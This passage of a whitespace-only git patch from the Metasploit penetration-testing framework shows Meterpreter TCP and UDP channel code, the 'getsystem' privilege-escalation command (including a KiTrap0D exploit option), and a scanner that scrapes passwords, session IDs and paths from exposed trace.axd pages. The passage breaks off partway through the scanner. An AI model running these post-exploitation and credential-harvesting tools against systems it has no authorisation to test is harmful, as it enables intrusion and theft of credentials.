From a953c47cfb38809c7af44ce0ef98b230be55b061 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Mon, 26 Apr 2010 18:29:24 +0000
Subject: [PATCH] remove carriage returns

git-svn-id: file:///home/svn/framework3/trunk@9140 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../socket_subsystem/tcp_server_channel.rb    | 334 +++---
 .../net/socket_subsystem/udp_channel.rb       | 384 +++----
 .../command_dispatcher/priv/elevate.rb        | 194 ++--
 modules/auxiliary/scanner/http/trace_axd.rb   | 240 ++---
 .../windows/browser/ms10_002_aurora.rb        | 316 +++---
 .../windows/browser/ms10_018_ie_behaviors.rb  | 500 ++++-----
 .../browser/ms10_018_ie_tabular_activex.rb    | 246 ++---
 .../windows/ftp/trellian_client_pasv.rb       | 186 ++--
 tools/msfcrawler.rb                           | 998 +++++++++---------
 9 files changed, 1699 insertions(+), 1699 deletions(-)

diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
index 9c41fc0d4e..2ce3c5d4b7 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb
@@ -1,167 +1,167 @@
-require 'timeout'
-require 'thread'
-require 'rex/socket/parameters'
-require 'rex/post/meterpreter/channels/stream'
-require 'rex/post/meterpreter/extensions/stdapi/tlv'
-require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
-
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module Stdapi
-module Net
-module SocketSubsystem
-
-class TcpServerChannel < Rex::Post::Meterpreter::Channel
-	
-	#
-	# This is a class variable to store all pending client tcp connections which have not been passed
-	# off via a call to the respective server tcp channels accept method. The dictionary key is the
-	# tcp server channel instance and the values held are an array of pending tcp client channels 
-	# connected to the tcp server channel.
-	#
-	@@server_channels = {}
-	
-	class << self
-		include Rex::Post::Meterpreter::InboundPacketHandler
-		
-		#
-		# This is the request handler which is registerd to the respective meterpreter instance via
-		# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
-		# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request 
-		# received and store it in the respective tcp server channels list of new pending client channels.
-		# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
-		#
-		def request_handler( client, packet )
-			
-			if( packet.method == "tcp_channel_open" )
-				
-				cid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
-				pid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
-				localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
-				localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
-				peerhost  = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
-				peerport  = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
-			
-				if( cid == nil or pid == nil )
-					return false
-				end
-				
-				server_channel = client.find_channel( pid )
-				if( server_channel == nil )
-					return false
-				end
-				
-				params = Rex::Socket::Parameters.from_hash( 
-					{ 
-						'Proto'     => 'tcp',
-						'LocalHost' => localhost,
-						'LocalPort' => localport,
-						'PeerHost'  => peerhost,
-						'PeerPort'  => peerport,
-						'Comm'      => server_channel.client
-					} 
-				)
-				
-				client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
-				
-				client_channel.params = params
-				
-				if( @@server_channels[server_channel] == nil )
-					@@server_channels[server_channel] = [] 
-				end
-				
-				@@server_channels[server_channel] << client_channel
-				
-				return true
-			end
-			
-			return false
-		end
-		
-		def cls
-			return CHANNEL_CLASS_STREAM
-		end
-		
-	end
-	
-	#
-	# Open a new tcp server channel on the remote end.
-	#
-	def TcpServerChannel.open(client, params)
-		c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
-			[
-				{
-				'type'  => TLV_TYPE_LOCAL_HOST,
-				'value' => params.localhost
-				},
-				{
-				'type'  => TLV_TYPE_LOCAL_PORT,
-				'value' => params.localport
-				}
-			] )
-		c.params = params
-		c
-	end
-	
-	#
-	# Simply initilize this instance.
-	#
-	def initialize(client, cid, type, flags)
-		super(client, cid, type, flags)
-		# add this instance to the class variables dictionary of tcp server channels
-		@@server_channels[self] = []
-	end
-	
-	#
-	# Accept a new tcp client connection form this tcp server channel. This method does not block
-	# and returns nil if no new client connection is available.
-	#
-	def accept_nonblock
-		result = nil
-		if( @@server_channels[self].length > 0 )
-			channel = @@server_channels[self].shift
-			result = channel.lsock
-		end
-		return result
-	end
-	
-	#
-	# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
-	# if no timeout is specified.
-	#
-	def accept( opts={} )
-		timeout = opts['Timeout'] || -1
-		if( timeout == -1 )
-			result = _accept
-		else
-			begin
-				::Timeout.timeout( timeout ) {
-					result = _accept
-				}
-			rescue Timeout::Error
-				result = nil
-			end
-		end
-		return result
-	end
-
-protected
-
-	def _accept
-		while( true )  
-			if( @@server_channels[self].empty? )
-				Rex::ThreadSafe.sleep( 0.2 )
-				next
-			end
-			result = accept_nonblock
-			break if result != nil
-		end
-		return result
-	end
-
-end
-
-end; end; end; end; end; end; end
-
+require 'timeout'
+require 'thread'
+require 'rex/socket/parameters'
+require 'rex/post/meterpreter/channels/stream'
+require 'rex/post/meterpreter/extensions/stdapi/tlv'
+require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Net
+module SocketSubsystem
+
+class TcpServerChannel < Rex::Post::Meterpreter::Channel
+	
+	#
+	# This is a class variable to store all pending client tcp connections which have not been passed
+	# off via a call to the respective server tcp channels accept method. The dictionary key is the
+	# tcp server channel instance and the values held are an array of pending tcp client channels 
+	# connected to the tcp server channel.
+	#
+	@@server_channels = {}
+	
+	class << self
+		include Rex::Post::Meterpreter::InboundPacketHandler
+		
+		#
+		# This is the request handler which is registerd to the respective meterpreter instance via
+		# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
+		# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request 
+		# received and store it in the respective tcp server channels list of new pending client channels.
+		# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
+		#
+		def request_handler( client, packet )
+			
+			if( packet.method == "tcp_channel_open" )
+				
+				cid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
+				pid       = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
+				localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
+				localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
+				peerhost  = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
+				peerport  = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
+			
+				if( cid == nil or pid == nil )
+					return false
+				end
+				
+				server_channel = client.find_channel( pid )
+				if( server_channel == nil )
+					return false
+				end
+				
+				params = Rex::Socket::Parameters.from_hash( 
+					{ 
+						'Proto'     => 'tcp',
+						'LocalHost' => localhost,
+						'LocalPort' => localport,
+						'PeerHost'  => peerhost,
+						'PeerPort'  => peerport,
+						'Comm'      => server_channel.client
+					} 
+				)
+				
+				client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
+				
+				client_channel.params = params
+				
+				if( @@server_channels[server_channel] == nil )
+					@@server_channels[server_channel] = [] 
+				end
+				
+				@@server_channels[server_channel] << client_channel
+				
+				return true
+			end
+			
+			return false
+		end
+		
+		def cls
+			return CHANNEL_CLASS_STREAM
+		end
+		
+	end
+	
+	#
+	# Open a new tcp server channel on the remote end.
+	#
+	def TcpServerChannel.open(client, params)
+		c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
+			[
+				{
+				'type'  => TLV_TYPE_LOCAL_HOST,
+				'value' => params.localhost
+				},
+				{
+				'type'  => TLV_TYPE_LOCAL_PORT,
+				'value' => params.localport
+				}
+			] )
+		c.params = params
+		c
+	end
+	
+	#
+	# Simply initilize this instance.
+	#
+	def initialize(client, cid, type, flags)
+		super(client, cid, type, flags)
+		# add this instance to the class variables dictionary of tcp server channels
+		@@server_channels[self] = []
+	end
+	
+	#
+	# Accept a new tcp client connection form this tcp server channel. This method does not block
+	# and returns nil if no new client connection is available.
+	#
+	def accept_nonblock
+		result = nil
+		if( @@server_channels[self].length > 0 )
+			channel = @@server_channels[self].shift
+			result = channel.lsock
+		end
+		return result
+	end
+	
+	#
+	# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
+	# if no timeout is specified.
+	#
+	def accept( opts={} )
+		timeout = opts['Timeout'] || -1
+		if( timeout == -1 )
+			result = _accept
+		else
+			begin
+				::Timeout.timeout( timeout ) {
+					result = _accept
+				}
+			rescue Timeout::Error
+				result = nil
+			end
+		end
+		return result
+	end
+
+protected
+
+	def _accept
+		while( true )  
+			if( @@server_channels[self].empty? )
+				Rex::ThreadSafe.sleep( 0.2 )
+				next
+			end
+			result = accept_nonblock
+			break if result != nil
+		end
+		return result
+	end
+
+end
+
+end; end; end; end; end; end; end
+
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
index 4493fbd6d9..c32574a9df 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb
@@ -1,192 +1,192 @@
-require 'timeout'
-require 'rex/sync/thread_safe'
-require 'rex/socket/udp'
-require 'rex/socket/parameters'
-require 'rex/post/meterpreter/extensions/stdapi/tlv'
-require 'rex/post/meterpreter/channel'
-
-module Rex
-module Post
-module Meterpreter
-module Extensions
-module Stdapi
-module Net
-module SocketSubsystem
-
-class UdpChannel < Rex::Post::Meterpreter::Channel
-
-	#
-	# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
-	#
-	include Rex::Socket::Udp
-	
-	#
-	# We are a datagram channel.
-	#
-	class << self
-		def cls
-			return CHANNEL_CLASS_DATAGRAM
-		end
-	end
-	
-	#
-	# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
-	# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
-	# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
-	# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
-	# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
-	#
-	def UdpChannel.open(client, params)
-		c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
-		[
-			{
-				'type'  => TLV_TYPE_LOCAL_HOST,
-				'value' => params.localhost
-			},
-			{
-				'type'  => TLV_TYPE_LOCAL_PORT,
-				'value' => params.localport
-			},
-			{
-				'type'  => TLV_TYPE_PEER_HOST,
-				'value' => params.peerhost
-			},
-			{
-				'type'  => TLV_TYPE_PEER_PORT,
-				'value' => params.peerport
-			}
-		] )
-		c.params = params
-		c
-	end
-	
-	#
-	# Simply initilize this instance.
-	#
-	def initialize(client, cid, type, flags)
-		super(client, cid, type, flags)
-		# the instance variable that holds all incoming datagrams.
-		@datagrams = []
-	end
-
-	#
-	# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
-	# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
-	#
-	def timed_read( length=65535, timeout=def_read_timeout )
-		result = ''
-		
-		begin
-			Timeout.timeout( timeout ) {
-				while( true )
-					if( @datagrams.empty? )
-						Rex::ThreadSafe.sleep( 0.2 )
-						next
-					end
-					result = self.read( length )
-					break
-				end
-			}
-		rescue Timeout::Error
-			result = ''
-		end
-		
-		return result
-	end
-	
-	#
-	# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the 
-	# datagrams which the remote end of this channel has received and are in the
-	# queue.
-	#
-	def recvfrom( length=65535, timeout=def_read_timeout )
-		result = nil
-		# force a timeout on the wait for an incoming datagram
-		begin
-			Timeout.timeout( timeout ) {
-				while( true )
-					# wait untill we have at least one datagram in the queue
-					if( @datagrams.empty? )
-						Rex::ThreadSafe.sleep( 0.2 )
-						next
-					end
-					# grab the oldest datagram we have received...
-					result = @datagrams.shift
-					# break as we have a result...
-					break
-				end
-			}
-		rescue Timeout::Error
-			result = nil
-		end
-		# if no result return nothing
-		if( result == nil )
-			return [ '', nil, nil ]
-		end
-		# get the data from this datagram
-		data = result[0]
-		# if its only a partial read of this datagram, slice it, loosing the remainder.
-		result[0] = data[0,length-1] if data.length > length
-		# return the result in the form [ data, host, port ]
-		return result
-	end
-	
-	#
-	# Overwrite the low level sysread to read data off our datagram queue. Calls
-	# to read() will end up calling this.
-	#
-	def sysread( length )
-		result = self.recvfrom( length )
-		return result[0]
-	end
-	
-	#
-	# Overwrite the low level syswrite to write data to the remote end of the channel. 
-	# Calls to write() will end up calling this.
-	#
-	def syswrite( buf )
-		return _write( buf )
-	end
-
-	#
-	# This function is called by Rex::Socket::Udp.sendto and writes data to a specified 
-	# remote peer host/port via the remote end of the channel.
-	#
-	def send( buf, flags, saddr )
-		af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
-		
-		addends = [
-			{
-				'type'  => TLV_TYPE_PEER_HOST,
-				'value' => peerhost
-			},
-			{
-				'type'  => TLV_TYPE_PEER_PORT,
-				'value' => peerport
-			}
-		]
-		
-		return _write( buf, buf.length, addends )
-	end
-
-	#
-	# The channels direct io write handler for any incoming data from the remote end 
-	# of the channel. We extract the data and peer host/port, and save this to a queue
-	# of incoming datagrams which are passed out via calls to self.recvfrom()
-	#
-	def dio_write_handler( packet, data )
-
-		peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
-		peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
-		
-		if( peerhost and peerport )
-			@datagrams << [ data, peerhost, peerport ]
-			return true
-		end
-		
-		return false
-	end
-
-end
-
-end; end; end; end; end; end; end
+require 'timeout'
+require 'rex/sync/thread_safe'
+require 'rex/socket/udp'
+require 'rex/socket/parameters'
+require 'rex/post/meterpreter/extensions/stdapi/tlv'
+require 'rex/post/meterpreter/channel'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Stdapi
+module Net
+module SocketSubsystem
+
+class UdpChannel < Rex::Post::Meterpreter::Channel
+
+	#
+	# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
+	#
+	include Rex::Socket::Udp
+	
+	#
+	# We are a datagram channel.
+	#
+	class << self
+		def cls
+			return CHANNEL_CLASS_DATAGRAM
+		end
+	end
+	
+	#
+	# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
+	# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
+	# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
+	# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
+	# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
+	#
+	def UdpChannel.open(client, params)
+		c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
+		[
+			{
+				'type'  => TLV_TYPE_LOCAL_HOST,
+				'value' => params.localhost
+			},
+			{
+				'type'  => TLV_TYPE_LOCAL_PORT,
+				'value' => params.localport
+			},
+			{
+				'type'  => TLV_TYPE_PEER_HOST,
+				'value' => params.peerhost
+			},
+			{
+				'type'  => TLV_TYPE_PEER_PORT,
+				'value' => params.peerport
+			}
+		] )
+		c.params = params
+		c
+	end
+	
+	#
+	# Simply initilize this instance.
+	#
+	def initialize(client, cid, type, flags)
+		super(client, cid, type, flags)
+		# the instance variable that holds all incoming datagrams.
+		@datagrams = []
+	end
+
+	#
+	# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
+	# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
+	#
+	def timed_read( length=65535, timeout=def_read_timeout )
+		result = ''
+		
+		begin
+			Timeout.timeout( timeout ) {
+				while( true )
+					if( @datagrams.empty? )
+						Rex::ThreadSafe.sleep( 0.2 )
+						next
+					end
+					result = self.read( length )
+					break
+				end
+			}
+		rescue Timeout::Error
+			result = ''
+		end
+		
+		return result
+	end
+	
+	#
+	# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the 
+	# datagrams which the remote end of this channel has received and are in the
+	# queue.
+	#
+	def recvfrom( length=65535, timeout=def_read_timeout )
+		result = nil
+		# force a timeout on the wait for an incoming datagram
+		begin
+			Timeout.timeout( timeout ) {
+				while( true )
+					# wait untill we have at least one datagram in the queue
+					if( @datagrams.empty? )
+						Rex::ThreadSafe.sleep( 0.2 )
+						next
+					end
+					# grab the oldest datagram we have received...
+					result = @datagrams.shift
+					# break as we have a result...
+					break
+				end
+			}
+		rescue Timeout::Error
+			result = nil
+		end
+		# if no result return nothing
+		if( result == nil )
+			return [ '', nil, nil ]
+		end
+		# get the data from this datagram
+		data = result[0]
+		# if its only a partial read of this datagram, slice it, loosing the remainder.
+		result[0] = data[0,length-1] if data.length > length
+		# return the result in the form [ data, host, port ]
+		return result
+	end
+	
+	#
+	# Overwrite the low level sysread to read data off our datagram queue. Calls
+	# to read() will end up calling this.
+	#
+	def sysread( length )
+		result = self.recvfrom( length )
+		return result[0]
+	end
+	
+	#
+	# Overwrite the low level syswrite to write data to the remote end of the channel. 
+	# Calls to write() will end up calling this.
+	#
+	def syswrite( buf )
+		return _write( buf )
+	end
+
+	#
+	# This function is called by Rex::Socket::Udp.sendto and writes data to a specified 
+	# remote peer host/port via the remote end of the channel.
+	#
+	def send( buf, flags, saddr )
+		af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
+		
+		addends = [
+			{
+				'type'  => TLV_TYPE_PEER_HOST,
+				'value' => peerhost
+			},
+			{
+				'type'  => TLV_TYPE_PEER_PORT,
+				'value' => peerport
+			}
+		]
+		
+		return _write( buf, buf.length, addends )
+	end
+
+	#
+	# The channels direct io write handler for any incoming data from the remote end 
+	# of the channel. We extract the data and peer host/port, and save this to a queue
+	# of incoming datagrams which are passed out via calls to self.recvfrom()
+	#
+	def dio_write_handler( packet, data )
+
+		peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
+		peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
+		
+		if( peerhost and peerport )
+			@datagrams << [ data, peerhost, peerport ]
+			return true
+		end
+		
+		return false
+	end
+
+end
+
+end; end; end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
index dd76a10dbd..f995178e2a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -1,98 +1,98 @@
-require 'rex/post/meterpreter'
-
-module Rex
-module Post
-module Meterpreter
-module Ui
-
-###
-#
-# The local privilege escalation portion of the extension.
-#
-###
-class Console::CommandDispatcher::Priv::Elevate
-
-	Klass = Console::CommandDispatcher::Priv::Elevate
-
-	include Console::CommandDispatcher
-	
-	ELEVATE_TECHNIQUE_NONE					= -1
-	ELEVATE_TECHNIQUE_ANY					= 0
-	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE		= 1
-	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2	= 2
-	ELEVATE_TECHNIQUE_SERVICE_TOKENDUP		= 3
-	ELEVATE_TECHNIQUE_VULN_KITRAP0D			= 4
-
-	ELEVATE_TECHNIQUE_DESCRIPTION = [ 	"All techniques available", 
-										"Service - Named Pipe Impersonation (In Memory/Admin)",
-										"Service - Named Pipe Impersonation (Dropper/Admin)",
-										"Service - Token Duplication (In Memory/Admin)",
-										"Exploit - KiTrap0D (In Memory/User)"
-									]
-	#
-	# List of supported commands.
-	#
-	def commands
-		{
-			"getsystem" => "Attempt to elevate your privilege to that of local system."
-		}
-	end
-
-	#
-	# Name for this dispatcher.
-	#
-	def name
-		"Priv: Elevate"
-	end
-	
-
-	#
-	# Attempt to elevate the meterpreter to that of local system.
-	#
-	def cmd_getsystem( *args )
-	
-		technique = ELEVATE_TECHNIQUE_ANY
-		
-		desc = ""
-		ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
-		
-		getsystem_opts = Rex::Parser::Arguments.new(
-			"-h" => [ false, "Help Banner." ],
-			"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
-		)
-		
-		getsystem_opts.parse(args) { | opt, idx, val |
-			case opt
-				when "-h"
-					print_line( "Usage: getsystem [options]\n" )
-					print_line( "Attempt to elevate your privilege to that of local system." )
-					print_line( getsystem_opts.usage )
-					return
-				when "-t"
-					technique = val.to_i
-			end
-		}
-
-		if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
-			print_error( "Technique '#{technique}' is out of range." );
-			return false;
-		end
-			
-		result = client.priv.getsystem( technique )
-		
-		# got system?
-		if result[0]
-			print_line( "...got system (via technique #{result[1]})." );
-		else
-			print_line( "...failed to get system." );
-		end
-		
-		return result
-	end
-
-end
-
-end
-end
-end
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# The local privilege escalation portion of the extension.
+#
+###
+class Console::CommandDispatcher::Priv::Elevate
+
+	Klass = Console::CommandDispatcher::Priv::Elevate
+
+	include Console::CommandDispatcher
+	
+	ELEVATE_TECHNIQUE_NONE					= -1
+	ELEVATE_TECHNIQUE_ANY					= 0
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE		= 1
+	ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2	= 2
+	ELEVATE_TECHNIQUE_SERVICE_TOKENDUP		= 3
+	ELEVATE_TECHNIQUE_VULN_KITRAP0D			= 4
+
+	ELEVATE_TECHNIQUE_DESCRIPTION = [ 	"All techniques available", 
+										"Service - Named Pipe Impersonation (In Memory/Admin)",
+										"Service - Named Pipe Impersonation (Dropper/Admin)",
+										"Service - Token Duplication (In Memory/Admin)",
+										"Exploit - KiTrap0D (In Memory/User)"
+									]
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"getsystem" => "Attempt to elevate your privilege to that of local system."
+		}
+	end
+
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Priv: Elevate"
+	end
+	
+
+	#
+	# Attempt to elevate the meterpreter to that of local system.
+	#
+	def cmd_getsystem( *args )
+	
+		technique = ELEVATE_TECHNIQUE_ANY
+		
+		desc = ""
+		ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
+		
+		getsystem_opts = Rex::Parser::Arguments.new(
+			"-h" => [ false, "Help Banner." ],
+			"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
+		)
+		
+		getsystem_opts.parse(args) { | opt, idx, val |
+			case opt
+				when "-h"
+					print_line( "Usage: getsystem [options]\n" )
+					print_line( "Attempt to elevate your privilege to that of local system." )
+					print_line( getsystem_opts.usage )
+					return
+				when "-t"
+					technique = val.to_i
+			end
+		}
+
+		if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
+			print_error( "Technique '#{technique}' is out of range." );
+			return false;
+		end
+			
+		result = client.priv.getsystem( technique )
+		
+		# got system?
+		if result[0]
+			print_line( "...got system (via technique #{result[1]})." );
+		else
+			print_line( "...failed to get system." );
+		end
+		
+		return result
+	end
+
+end
+
+end
+end
+end
 end
\ No newline at end of file
diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb
index 2afdff4a33..fc0371a988 100644
--- a/modules/auxiliary/scanner/http/trace_axd.rb
+++ b/modules/auxiliary/scanner/http/trace_axd.rb
@@ -1,121 +1,121 @@
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Auxiliary
-	
-	# Exploit mixins should be called first
-	include Msf::Exploit::Remote::HttpClient	
-	include Msf::Auxiliary::WMAPScanDir
-	# Scanner mixin should be near last
-	include Msf::Auxiliary::Scanner
-	include Msf::Auxiliary::Report
-
-	def initialize
-		super(
-			'Name'        => 'HTTP trace.axd Content Scanner',
-			'Version'     => '$Revision: 7605 $',
-			'Description' => 'Detect trace.axd files and analize its content',
-			'Author'       => ['c4an'],
-			'License'     => MSF_LICENSE
-		)
-		
-		register_options(
-			[
-				OptString.new('PATH',  [ true,  "The test path to find trace.axd file", '/']),
-				OptBool.new('TRACE_DETAILS', [ true,  "Display trace.axd details", true ])							
-			], self.class)
-			
-		register_advanced_options(
-			[
-				OptString.new('StoreFile', [ false,  "Store all information into a file", './trace_axd.log'])
-			], self.class)
-	end	
-
-	def run_host(target_host)	
-		tpath = datastore['PATH'] 	
-		if tpath[-1,1] != '/'
-			tpath += '/'
-		end
-
-		begin
-			turl = tpath+'trace.axd'
-		
-			res = send_request_cgi({
-				'uri'          => turl,					
-				'method'       => 'GET',
-				'version' => '1.0',
-			}, 10)
-
-				
-			if res and res.body.include?("<td><h1>Application Trace</h1></td>") 
-				print_status("[#{target_host}] #{tpath}trace.axd FOUND.")				
-							
-				report_note(
-						:host	=> target_host,
-						:proto	=> 'HTTP',
-						:port	=> rport,
-						:type	=> 'TRACE_AXD',
-						:data	=> "trace.axd"
-					)
-					
-				if datastore['TRACE_DETAILS']																	
-
-					aregex = /Trace.axd\?id=\d/	
-					result = res.body.scan(aregex).uniq
-				
-					result.each do |u|
-						turl = tpath+u.to_s
-						
-						res = send_request_cgi({
-							'uri'          => turl,					
-							'method'       => 'GET',
-							'version' => '1.0',
-						}, 10)
-					
-						if res
-							reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/, 
-									 /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
-									 /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
-									 /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, 
-									  /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
-							]									 
-							print_status ("DETAIL: #{turl}")
-							reg_info.each do |reg|
-								result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
-								str = result.to_s.chomp
-							
-							
-								if reg.to_s.include?"APPL_PHYSICAL_PATH"					
-									print_status ("Physical Path: #{str}")
-								elsif reg.to_s.include?"UserId"
-									print_status ("User ID: #{str}")
-								elsif reg.to_s.include?"Password"
-									print_status ("Password: #{str}")							
-								elsif reg.to_s.include?"AspFilterSessionId"
-									print_status ("Session ID: #{str}")
-								elsif reg.to_s.include?"LOCAL_ADDR"							
-									print_status ("Local Address: #{str}")
-								elsif result.include?"Via"
-									print_status ("VIA: #{str}")
-								elsif reg.to_s.include?"ALL_RAW"			
-									print_status ("Headers: #{str}")
-								end
-							end
-						end													
-					end				
-				end
-			end	
-			
-		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-		rescue ::Timeout::Error, ::Errno::EPIPE
-		end
-	end
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+	
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::HttpClient	
+	include Msf::Auxiliary::WMAPScanDir
+	# Scanner mixin should be near last
+	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        => 'HTTP trace.axd Content Scanner',
+			'Version'     => '$Revision: 7605 $',
+			'Description' => 'Detect trace.axd files and analize its content',
+			'Author'       => ['c4an'],
+			'License'     => MSF_LICENSE
+		)
+		
+		register_options(
+			[
+				OptString.new('PATH',  [ true,  "The test path to find trace.axd file", '/']),
+				OptBool.new('TRACE_DETAILS', [ true,  "Display trace.axd details", true ])							
+			], self.class)
+			
+		register_advanced_options(
+			[
+				OptString.new('StoreFile', [ false,  "Store all information into a file", './trace_axd.log'])
+			], self.class)
+	end	
+
+	def run_host(target_host)	
+		tpath = datastore['PATH'] 	
+		if tpath[-1,1] != '/'
+			tpath += '/'
+		end
+
+		begin
+			turl = tpath+'trace.axd'
+		
+			res = send_request_cgi({
+				'uri'          => turl,					
+				'method'       => 'GET',
+				'version' => '1.0',
+			}, 10)
+
+				
+			if res and res.body.include?("<td><h1>Application Trace</h1></td>") 
+				print_status("[#{target_host}] #{tpath}trace.axd FOUND.")				
+							
+				report_note(
+						:host	=> target_host,
+						:proto	=> 'HTTP',
+						:port	=> rport,
+						:type	=> 'TRACE_AXD',
+						:data	=> "trace.axd"
+					)
+					
+				if datastore['TRACE_DETAILS']																	
+
+					aregex = /Trace.axd\?id=\d/	
+					result = res.body.scan(aregex).uniq
+				
+					result.each do |u|
+						turl = tpath+u.to_s
+						
+						res = send_request_cgi({
+							'uri'          => turl,					
+							'method'       => 'GET',
+							'version' => '1.0',
+						}, 10)
+					
+						if res
